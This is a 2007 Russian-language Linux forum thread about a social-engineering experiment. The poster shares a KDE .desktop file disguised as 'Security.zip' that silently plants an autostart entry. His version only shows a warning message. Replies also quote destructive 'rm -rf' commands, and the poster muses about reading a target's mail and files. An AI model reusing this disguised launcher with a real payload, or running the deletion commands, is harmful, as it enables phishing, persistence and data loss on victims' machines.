Привет всем,
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Привет всем, - 2007-05-22 19:20:27.890000
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Привет всем, Читаю Ваш форум давно, но зарегистрироваться решил только сегодня Чисто для эксперимента решил проверить своих знакомых линуксоидов на предмет неуязвимости к соц.инженерии и прочей хрени. Разослал шестерым емаил с описанием нового и важного security патча с советом сохранить на рабочий стол и кликнуть мышкой. Из 6 четверо "повелись". Так что линукс (КДЕ) защищён от соц.инженерии не более чем масдай. Предлагаю вашему вниманию этот файл (он абсолютно безвреден–просто делает предупреждение. Так что можно опробовать "на себе") ======================================================== Security.zip.desktop [Desktop Entry] Exec=echo -e "[Desktop Entry] \n Exec=xmessage -title \"Warning–security hole discovered\" -center \"At least one security hole is discovered on your system. It is located between your desktop and your chair. Never open files if they come from untrusted source ! \" \n InitialPreference=2 \n MimeType=application/x-kdeuser1 \n Name=Memo \n Terminal=false \n Type=Application \n Icon=tar" > ~/.kde/Autostart/Memo.desktop InitialPreference=2 MimeType=application/x-kdeuser1 Name=Security.zip Terminal=false Type=Application Icon=tar
|
|
|
RE: Привет всем, - 2007-05-22 19:26:23.610000
|
|
|
BuriK666
Сообщений: 349
Оценки: 0
Присоединился: 2005-06-21 08:47:59
|
хмм, и в чем прикол? quote:
Так что линукс (КДЕ) защищён от соц.инженерии не более чем масдай. ты именно с Linux (KDE) общался? это твоих знакомых патчить нужно!
|
|
|
RE: Привет всем, - 2007-05-22 19:51:23.603333
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
Существует народное поверье что каким бы чайником ни был user, если он сидит под Линуксом (КДЕ), то ему море по колено-никакие вирусы/аттачменты к емаил не страшны. Прикол в том что (даже БЕЗ execution bit) в "автостарт" можно залить произвольный скрипт "уговорив" сохранить desktop-файл на рабочий стол. Более того-файл успешно маскируется под zip-архив.
|
|
|
RE: Привет всем, - 2007-05-22 19:57:38.120000
|
|
|
BuriK666
Сообщений: 349
Оценки: 0
Присоединился: 2005-06-21 08:47:59
|
да ты хоть rm -rf /* сделай кроме твоих файлов ничего не потрется!!!!
|
|
|
RE: Привет всем, - 2007-05-22 20:15:17.613333
|
|
|
Xaleandr
Сообщений: 83
Оценки: 0
Присоединился: 2007-05-22 18:46:53.813333
|
quote:
ORIGINAL: BuriK666 да ты хоть rm -rf /* сделай кроме твоих файлов ничего не потрется!!!! Конечно ты прав, но зачем же так сразу зверствовать ! rm -rf ~/* более разумный вариант. А если серьёзно, где что хранится в КДЕ более-менее известно. К тому же иногда бывают более скромные практические задачи–например, меня интересует почта/файлы данного человека а не всех членов локальной сети. Для этого прав локального пользователя вполне достаточно. Впрочем, это скорее информация к размышлению на тему безопасности чем призыв к действию.
|
|
|
|
|